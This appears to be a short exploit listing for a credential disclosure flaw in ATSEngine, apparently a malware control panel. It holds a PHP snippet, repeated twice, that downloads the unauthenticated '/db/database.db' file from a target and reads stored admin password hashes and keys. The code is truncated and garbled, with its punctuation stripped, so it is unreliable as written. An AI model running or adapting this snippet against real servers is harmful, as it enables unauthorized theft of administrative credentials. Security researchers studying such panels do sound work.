Malware exploit: Atsengine

Type: Information Disclosure Author: Xylitol pre ?php $url = getURL; if $url !== NULL $database = @filegetcontents$url . '/db/database.db'; if $database !== FALSE fileputcontents'tmp.db', $database; $passwordmd5 = getOption'passwordmd5'; $pkey = getOption'pkey'; $jabberon = getOption'jabberon';...

ATSEngine credential disclosure vulnerability

Any user can download a .db configuration file without authenticating first. The .db file contains the credentials to the administrative web interface. ?php $url = getURL; if $url !== NULL $database = @filegetcontents$url . '/db/database.db'; if $database !== FALSE fileputcontents'tmp.db',...